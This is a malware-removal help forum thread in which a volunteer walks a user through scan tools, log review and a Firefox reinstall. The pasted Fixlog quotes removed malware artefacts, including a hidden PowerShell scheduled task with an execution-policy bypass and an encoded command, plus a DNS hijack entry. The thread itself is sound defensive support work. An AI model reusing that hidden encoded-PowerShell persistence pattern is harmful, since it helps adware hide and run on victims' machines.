-- File and folder backups are made for items removed using this tool. Should a legitimate file or folder be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the item. Please do not overly concern yourself with the contents of AdwCleaner[s1].txt.
 
======================================================

STEP 4
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt
  • JRT.txt
  • AdwCleaner[C1].txt
Link to post
Share on other sites

 

 

The file in question is a Windows Batch file, designed to execute commands via the Command Prompt. Did a user/player in-game send you this file to open? When communicating with players online, never download or open files sent to you as this could be a method of malware distribution. Before deleting the file, I would like to double-check the contents. 

If it is the one I think it is, I downloaded it from www.replay.gg, a third-party website that records games. Its supposed to be safe, but again; the names of those files are - like that one - very... hard to remember, so I can't really tell you if thats from there or not. 

fixlog.txt

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version:21-02-2016

Ran by Eirik (2016-02-22 22:01:41) Run:1
Running from C:\Users\Eirik\Desktop
Loaded Profiles: Eirik (Available Profiles: Eirik)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
C:\Program Files (x86)\Pando Networks
CHR HomePage: Default -> hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1
CHR StartupUrls: Default -> "hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1"
C:\ProgramData\e8446722-6f23-0
C:\ProgramData\e8446722-2d61-1
C:\ProgramData\e8446722-6925-0
C:\ProgramData\e8446722-69a5-0
C:\ProgramData\d2538854
2016-02-20 20:01 - 2016-02-20 20:01 - 00003728 _____ C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011}
C:\ProgramData\afa3c0d4-3a31-1
C:\ProgramData\afa3c0d4-36d7-0
C:\Users\Eirik\AppData\Local\Temp\32931009.t.exe
Task: {86E25734-C69A-4DFA-90D3-8E33960A544D} - System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => /s /n /i:"/rt" "C:\PROGRA~3\d2538854\d0129810.dll"
Task: {E0A724F9-2E64-483E-B1B1-9A0C7C41376A} - System32\Tasks\{09090D47-7809-0D78-0911-09090F0E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9412 more characters).
Tcpip\..\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}: [DhcpNameServer] 82.163.143.171
CMD: type C:\Users\Eirik\Downloads\replay_1346256955.bat
CMD: ipconfig /flushdns
EmptyTemp:
end
*****************
 
Restore point was successfully created.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5} => value removed successfully
HKCR\CLSID\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5} => key not found. 
"HKLM\Software\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin" => key removed successfully
C:\Program Files (x86)\Pando Networks => moved successfully
Chrome HomePage => removed successfully
Chrome StartupUrls => removed successfully
C:\ProgramData\e8446722-6f23-0 => moved successfully
C:\ProgramData\e8446722-2d61-1 => moved successfully
C:\ProgramData\e8446722-6925-0 => moved successfully
C:\ProgramData\e8446722-69a5-0 => moved successfully
C:\ProgramData\d2538854 => moved successfully
C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => moved successfully
C:\ProgramData\afa3c0d4-3a31-1 => moved successfully
C:\ProgramData\afa3c0d4-36d7-0 => moved successfully
C:\Users\Eirik\AppData\Local\Temp\32931009.t.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{86E25734-C69A-4DFA-90D3-8E33960A544D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86E25734-C69A-4DFA-90D3-8E33960A544D}" => key removed successfully
C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C6E33A63-3216-AF1A-2367-44E89883B011}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0A724F9-2E64-483E-B1B1-9A0C7C41376A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0A724F9-2E64-483E-B1B1-9A0C7C41376A}" => key removed successfully
C:\WINDOWS\System32\Tasks\{09090D47-7809-0D78-0911-09090F0E117A} => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{09090D47-7809-0D78-0911-09090F0E117A}" => key removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}\\DhcpNameServer => value removed successfully
 
=========  type C:\Users\Eirik\Downloads\replay_1346256955.bat =========
 
@echo off
setlocal enabledelayedexpansion
echo -----------------------
echo Spectate by op.gg
echo -----------------------
set RADS_PATH=
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO  (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\Classes\VirtualStore\MACHINE\SOFTWARE\Wow6432Node\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\Classes\VirtualStore\MACHINE\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKLM\Software\Wow6432Node\Riot Games\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKLM\Software\Wow6432Node\Riot Games\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKLM\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKLM\Software /V /F "LocalRootFolder" /S /E ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
echo ===================
echo EN: Finding another LOL directory path..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKLM\Software /s ^| %systemroot%\system32\find.exe "LocalRootFolder" ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
echo ===================
echo EN: Finding another LOL directory path..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKCU\Software /V /F "LocalRootFolder" /S /E ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
echo ===================
echo EN: Finding another LOL directory path again..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKCU\Software /s ^| %systemroot%\system32\find.exe "LocalRootFolder" ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
goto cannotFind
:runApp
set RADS_PATH=%RADS_PATH:/=\%
@cd /d "%RADS_PATH%\solutions\lol_game_client_sln\releases"
 
set init=0
set v0=0&set v1=0&set v2=0&set v3=0
for /f "delims=" %%F in ('dir *.*.*.* /b') do (
for /F "tokens=1,2,3,4 delims=." %%i in ("%%F") do (
if !init! equ 0 ( set init=1&set flag=1 ) else (
set flag=0
 
if %%i gtr !v0! ( set flag=1 ) else (
if %%j gtr !v1! ( set flag=1 ) else (
if %%k gtr !v2! ( set flag=1 ) else (
if %%l gtr !v3! ( set flag=1 )
)
)
)
)
 
if !flag! gtr 0 (
set v0=%%i&set v1=%%j&set v2=%%k&set v3=%%l
)
)
)
 
if !init! equ 0 goto cannotFind
set lolver=!v0!.!v1!.!v2!.!v3!
 
@cd /d "!RADS_PATH!\solutions\lol_game_client_sln\releases\!lolver!\deploy"
if exist "League of Legends.exe" (
@start "" "League of Legends.exe" "8394" "LoLLauncher.exe" "" "replay replay.gg:8080 mBnzoZNTDWCNJi1pm2RL8HTg8ToqjLw1 1346256955 EUN1"
goto exit
)
:cannotFind
echo ===================
echo EN: Cannot found LOL directory path for automatic. Please start your replay manually.
echo ===================
@pause
goto exit
:exit
========= End of CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 432.8 MB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 22:03:21 ====

 

JRT.txt

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.3 (02.09.2016)
Operating System: Windows 8.1 x64 
Ran by Eirik (Administrator) on 22-Feb-16 at 22:42:45.69
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 0 
 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 22-Feb-16 at 22:48:45.62
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

AdwCleaner[C2].txt (I didn't get a C1, is that because I ran AdqCleaner the other day too?

 

 

# AdwCleaner v5.036 - Logfile created 22/02/2016 at 23:04:05

# Updated 22/02/2016 by Xplode
# Database : 2016-02-22.2 [server]
# Operating system : Windows 8.1  (x64)
# Username : Eirik - NINJA
# Running from : C:\Users\Eirik\Desktop\adwcleaner_5.036.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\ProgramData\e8446722-0075-1
[-] Folder Deleted : C:\ProgramData\e8446722-0af1-1
[-] Folder Deleted : C:\ProgramData\e8446722-10c5-0
[-] Folder Deleted : C:\ProgramData\e8446722-2601-1
[-] Folder Deleted : C:\ProgramData\e8446722-29a1-0
[-] Folder Deleted : C:\ProgramData\e8446722-5e93-0
 
***** [ Files ] *****
 
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [2807 bytes] - [21/02/2016 12:48:16]
C:\AdwCleaner\AdwCleaner[C2].txt - [1074 bytes] - [22/02/2016 23:04:05]
C:\AdwCleaner\AdwCleaner[s1].txt - [2936 bytes] - [21/02/2016 12:46:56]
C:\AdwCleaner\AdwCleaner[s2].txt - [1171 bytes] - [22/02/2016 22:59:21]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [1293 bytes] ##########
 
Link to post
Share on other sites

Hello, 
 

If it is the one I think it is, I downloaded it from www.replay.gg, a third-party website that records games. Its supposed to be safe, but again; the names of those files are - like that one - very... hard to remember, so I can't really tell you if thats from there or not. 

You are correct. The file does indeed appear to be benign in nature. :)
 
Let's check for remnants. Please let me know if you are experiencing any outstanding issues. 
 
GzlsbnV.png ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

  • Please download ESET Online Scan and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Double-click esetsmartinstaller_enu.exe to run the programme. 
  • Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
  • Agree to the Terms of Use once more and click Start. Allow components to download.
  • Place a checkmark next to Enable detection of potentially unwanted applications.
  • Click Advanced settings. Place a checkmark next to:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Ensure Remove found threats is unchecked.
  • Click Start.
  • Wait for the scan to finish. Please be patient as this can take some time.
  • Upon completion, click esetListThreats.png. If no threats were found, skip the next two bullet points. 
  • Click esetExport.png and save the file to your Desktop, naming it something such as "MyEsetScan".
  • Push the Back button.
  • Place a checkmark next to KN1w2nv.png and click SzOC1p0.png.
  • Re-enable your anti-virus software.
  • Copy the contents of the log and paste in your next reply.
Link to post
Share on other sites

 

 

You are correct. The file does indeed appear to be benign in nature.  :)

So I can keep using that site without being afraid? Just to make sure... :)

 

MyEsetScan.txt

 

 

C:\FRST\Quarantine\C\ProgramData\d2538854\d0129810.dll a variant of Win32/Adware.Adposhel.A application

C:\ProgramData\InstallMate\{28B463D4-430D-4875-AA9E-0B2FF3574122}\Custom.dll Win32/InstalleRex.L potentially unwanted application
C:\Users\All Users\InstallMate\{28B463D4-430D-4875-AA9E-0B2FF3574122}\Custom.dll Win32/InstalleRex.L potentially unwanted application
C:\Users\Eirik\AppData\LocalLow\Sun\Java\jre1.7.0_60\java_sp.dll a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Users\Eirik\AppData\Roaming\uTorrent\updates\3.3.2_30416.exe a variant of Win32/OpenCandy.A potentially unsafe application
C:\Users\Eirik\Downloads\ccsetup_513.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\Eirik\Downloads\utorrent.exe a variant of Win32/OpenCandy.A potentially unsafe application
 
Link to post
Share on other sites

Hello Eirik, 
 

So I can keep using that site without being afraid? Just to make sure...  :)

Yes, that's correct. The website appears to be OK. 
https://www.virustotal.com/en/url/b2257ecc079c7a4408d2a48f72a5e1cab64bf7f725c07fca68dc35e82816605a/analysis/1456298940/
 
Delete the following folder: C:\ProgramData\InstallMate\{28B463D4-430D-4875-AA9E-0B2FF3574122}
 
How is your computer performing? Are there any outstanding issues?

Link to post
Share on other sites

Alright, so I deleted that. 

 

 

 

How is your computer performing? Are there any outstanding issues?

In general?

It does take a long time to start up. 

I've also gotten some annoying FPS issues lately, where my frames drop from 60 to 10 every now and then. Other than that nothing I can think of. 

As for Firefox. It still doesn't work. It starts, but everything is blank as you can see in the pic below. I can hover over where I'd usually have bookmarks and stuff, but nothing shows up and I can't click anything. 
http://i.imgur.com/v457kRJ.jpg?1
This is not a malware issue, I believe, it looks like those are gone. At least the "X has been blocked" has not popped up in a while. 

Link to post
Share on other sites

Hi Eirik, 
 
Let me know if the following resolves the issue with your browser. 
 
b8zkrsY.png Browser Reset
 
Before proceeding, please refer to the following instructions on how you can backup your Favourites/Bookmarks.

Using the relevant instructions below, please reset your installed browsers.

Link to post
Share on other sites

I can't do that. As you see in the pic above, everything is blank and I can't even click settings etc. 

This started happening after I reset Firefox the other day. A folder popped up on my desktop, "Gamle Firefox-data" (Old firefox data) after doing so, is it possible this might have to do with it? Im afraid of deleting it in case that means deleting all settings etc. 

Link to post
Share on other sites

Hello, 
 

A folder popped up on my desktop, "Gamle Firefox-data" (Old firefox data) after doing so, is it possible this might have to do with it? Im afraid of deleting it in case that means deleting all settings etc. 

This is normal. See here: 
https://support.mozilla.org/en-US/kb/refresh-firefox-reset-add-ons-and-settings
 
At this point in time, uninstalling and reinstalling Firefox appears to be the best method to restore functionality.
 
STEP 1
Qlf57ne.png Backup Firefox Bookmarks and Saved Logins

  • Please download and install U5NwUGc.png Google Chrome.
  • Open Chrome. Click Settings 8QmZfAJ.png, followed by Bookmarks, followed by Import bookmarks and settings....
  • Select Mozilla Firefox in the dropdown menu and the items you wish to import. Click Import.
  • Before moving onto Step 2, please confirm your bookmarks/saved logins were successfully imported into Chrome.
     

STEP 2
6JO0hXH.png Revo Uninstaller

  • Please download and install Revo Uninstaller.
  • Double-Click Revo Uninstaller to run the programme. 
  • From the list of programmes, locate the following, or anything similar and carry out the steps below one at a time.
    • Mozilla Firefox
  • Double-Click the programme. 
  • When prompted if you want to uninstall click Yes.
  • Ensure the Moderate option is selected and click Next.
  • The programme uninstaller will run. If prompted again click Yes.
  • Work your way through the uninstaller, ensuring you read each page thoroughly.
  • Note: If you are offered the choice to install additional software, ensure you decline
  • Once the built-in uninstaller is finished click Next.
  • Once the programme has searched for leftovers click Next.
  • Check items in bold only in the list and click Delete. You may have to expand folders by clicking the "+" mark.
  • When prompted click Yes, followed by Next.
  • Click Select all, followed by Delete.
  • When prompted click Yes, followed by Next.
  • Upon completion, click Finish.
  • In your next reply, confirm you were successful in uninstalling all programmes listed above. 
     

STEP 3
Qlf57ne.png Restore Firefox Bookmarks and Saved Logins

  • Please download and install Qlf57ne.png Mozilla Firefox.
  • Open Firefox. Press Ctrl Shift on your keyboard at the same time.
  • Click Import and Backup, followed by Import Data from Another Browser....
  • Select Chrome and click Next.
  • Select the items you wish to restore, click Next and follow the prompts to complete the import. 
Link to post
Share on other sites

 

 

In your next reply, confirm you were successful in uninstalling all programmes listed above. 

Not sure if this is supposed to be before or after I install again. Not in a hurry, so I'll leave this here untill you've said so ;)

Yes, it was successful - I got my bookmarks in Chrome now, and Firefox is gone. 

Link to post
Share on other sites

Okay. :) Now that Firefox has been removed using Revo, and your bookmarks backed up in Chrome, try reinstalling Firefox. 

 

Let me know if you are able to install the browser, and if normal functionality is restored.

Its not, sadly. Its still the same problem. It actually loaded this time tho, but I still can't click anything. The only places I can click is like, the 3 in the corner - minimize, the other thing and "X". 

Again tho, holding over stuff shows the info-box thing that would usually come up. it just doesn't have the "box" around (Pic below from Chrome to show what I mean), and clicking does nothing. 

Pic to show the "boxes" Im talking about: http://i.imgur.com/BMsYelI.jpg?1

Link to post
Share on other sites

Hello, 
 

It gets blocked by SkyHunter 4)

I assume you mean SpyHunter 4. When did you install this software? It was not present when you initially posted. 
 

Its not, sadly. Its still the same problem. It actually loaded this time tho, but I still can't click anything. The only places I can click is like, the 3 in the corner - minimize, the other thing and "X". 

Okay. Let's get a fresh set of FRST logs.
 
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 
Link to post
Share on other sites

Right, damn. Yes, I believe I installed it right after I first posted or something. As I was after all getting the viruses while I had Avast (Which I still do have tho.), I thought I'd just buy SpyHunter which I saw someone recommend somewhere. Sorry if I should not have done that in the process or should have said so. 

FRST.txt
 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:21-02-2016

Ran by Eirik (administrator) on NINJA (27-02-2016 02:11:27)
Running from C:\Users\Eirik\Desktop
Loaded Profiles: Eirik &  (Available Profiles: Eirik)
Platform: Windows 8.1 0(X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\SCM\MSIService.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
() C:\Windows\System32\igfxTray.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
